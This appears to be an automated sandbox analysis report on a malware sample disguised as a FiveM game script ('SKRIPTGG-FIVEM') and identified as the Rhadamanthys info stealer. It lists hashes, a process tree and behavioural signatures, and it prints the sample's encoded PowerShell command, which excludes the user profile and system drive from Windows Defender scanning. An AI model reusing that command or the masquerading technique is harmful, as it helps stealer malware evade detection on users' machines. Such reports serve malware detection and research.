Overview
overview
10Static
static
3SKRIPTGG-F...in.zip
windows7-x64
1SKRIPTGG-F...in.zip
windows10-2004-x64
1SKRIPTGG-F...DME.md
windows7-x64
3SKRIPTGG-F...DME.md
windows10-2004-x64
3SKRIPTGG-F...pt.rar
windows7-x64
10SKRIPTGG-F...pt.rar
windows10-2004-x64
7launcher.exe
windows7-x64
10launcher.exe
windows10-2004-x64
10SKRIPTGG-F...se.dll
windows7-x64
1SKRIPTGG-F...se.dll
windows10-2004-x64
1Resubmissions
27-03-2024 17:10
240327-vp3klabh7y 1027-03-2024 17:07
240327-vnfdnsbh4w 327-03-2024 17:03
240327-vknwmsbg61 10Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
27-03-2024 17:03
Static task
static1
Behavioral task
behavioral1
Sample
SKRIPTGG-FIVEM-main.zip
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
SKRIPTGG-FIVEM-main.zip
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
SKRIPTGG-FIVEM-main/README.md
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
SKRIPTGG-FIVEM-main/README.md
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
SKRIPTGG-FIVEM-main/Skript.rar
Resource
win7-20240215-en
Behavioral task
behavioral6
Sample
SKRIPTGG-FIVEM-main/Skript.rar
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
launcher.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
launcher.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
SKRIPTGG-FIVEM-main/license.dll
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
SKRIPTGG-FIVEM-main/license.dll
Resource
win10v2004-20240226-en
General
-
Target
launcher.exe
-
Size
4.7MB
-
MD5
620024df612c13a4a33cf785384c2086
-
SHA1
a6ae999723bea18c6d3acf2c52ed682f6226b7be
-
SHA256
cd825788095cd61de39d98d6365ed80004cc55a64f4f115ef6bf532617bb0af1
-
SHA512
34d4d8a423d98bf0b8d4f18dc980bed97e9492f0817bb1e2dff99fc8d9d0cfaa2687514eff7717b1310a2c858236614490e980390612901e08b69b6ded451bdd
-
SSDEEP
98304:HqZRVmbr2CkyPqPnowAWTbNJ2EyT2QT27JaSGKN/3pJ:QVs6ysoDEUvwJEKdZJ
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid Process procid_target PID 2312 created 1200 2312 svchost.exe 21 -
Executes dropped EXE 3 IoCs
Processes:
explorer.exesvchost.exeexplorer.exepid Process 1728 explorer.exe 2312 svchost.exe 2708 explorer.exe -
Loads dropped DLL 5 IoCs
Processes:
launcher.exeexplorer.exeexplorer.exepid Process 2088 launcher.exe 2088 launcher.exe 2088 launcher.exe 1728 explorer.exe 2708 explorer.exe -
Processes:
resource yara_rule behavioral7/files/0x0006000000016a9a-33.dat upx behavioral7/memory/2708-35-0x000007FEF5C90000-0x000007FEF60F6000-memory.dmp upx -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule behavioral7/files/0x000a0000000122b8-2.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exesvchost.exedialer.exepid Process 2016 powershell.exe 2312 svchost.exe 2312 svchost.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2016 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
launcher.exeexplorer.exesvchost.exedescription pid Process procid_target PID 2088 wrote to memory of 2016 2088 launcher.exe 28 PID 2088 wrote to memory of 2016 2088 launcher.exe 28 PID 2088 wrote to memory of 2016 2088 launcher.exe 28 PID 2088 wrote to memory of 2016 2088 launcher.exe 28 PID 2088 wrote to memory of 2016 2088 launcher.exe 28 PID 2088 wrote to memory of 2016 2088 launcher.exe 28 PID 2088 wrote to memory of 2016 2088 launcher.exe 28 PID 2088 wrote to memory of 1728 2088 launcher.exe 30 PID 2088 wrote to memory of 1728 2088 launcher.exe 30 PID 2088 wrote to memory of 1728 2088 launcher.exe 30 PID 2088 wrote to memory of 1728 2088 launcher.exe 30 PID 2088 wrote to memory of 2312 2088 launcher.exe 31 PID 2088 wrote to memory of 2312 2088 launcher.exe 31 PID 2088 wrote to memory of 2312 2088 launcher.exe 31 PID 2088 wrote to memory of 2312 2088 launcher.exe 31 PID 2088 wrote to memory of 2312 2088 launcher.exe 31 PID 2088 wrote to memory of 2312 2088 launcher.exe 31 PID 2088 wrote to memory of 2312 2088 launcher.exe 31 PID 1728 wrote to memory of 2708 1728 explorer.exe 32 PID 1728 wrote to memory of 2708 1728 explorer.exe 32 PID 1728 wrote to memory of 2708 1728 explorer.exe 32 PID 2312 wrote to memory of 2444 2312 svchost.exe 33 PID 2312 wrote to memory of 2444 2312 svchost.exe 33 PID 2312 wrote to memory of 2444 2312 svchost.exe 33 PID 2312 wrote to memory of 2444 2312 svchost.exe 33 PID 2312 wrote to memory of 2444 2312 svchost.exe 33 PID 2312 wrote to memory of 2444 2312 svchost.exe 33 PID 2312 wrote to memory of 2444 2312 svchost.exe 33 PID 2312 wrote to memory of 2444 2312 svchost.exe 33 PID 2312 wrote to memory of 2444 2312 svchost.exe 33
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\launcher.exe"C:\Users\Admin\AppData\Local\Temp\launcher.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcgBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBjACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Users\Admin\AppData\Local\Temp\explorer.exe"C:\Users\Admin\AppData\Local\Temp\explorer.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\explorer.exe"C:\Users\Admin\AppData\Local\Temp\explorer.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2708
-
-
-
C:\Users\Admin\AppData\Local\svchost.exe"C:\Users\Admin\AppData\Local\svchost.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2312
-
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2444
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD53f782cf7874b03c1d20ed90d370f4329
SHA108a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA2562a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857
-
Filesize
355KB
MD58a6f1580a5b9b94d7cd47cc6b1af1b9a
SHA1e68768afd59e18091d345cb300e859572e8d4c5c
SHA256bb1464e75c750d90c0c49d148c9e64eefe0c29b2f670d708c8085ddd3104dbfe
SHA5121663a9e0868b3f5d7e1edd30259024e419c2d190ec8c31e76e66aef0c8a0e02da0c829584214b9e2f76cbd349a53bf77d01d03e9b0e9c8a99eb18021b1d53309
-
Filesize
4.4MB
MD5aba4fcf0d72b487887f315202bc43ae4
SHA1de51440c742c58f52f3b7cc2a1fcda5abd3d1ca8
SHA2568f312c17c2a525ac9bc0838e4d9f69db5bb20478ffa4880fb3a8b98caf0e25ef
SHA512fed41d5eb4a61c43bb3032c0d0b3d347d6b89a06d2928155f2e0baa59295ae71d3e689c3c78a584f2db64fd5ab3a06578623a8d41d7055b535c4d2317aef2bf9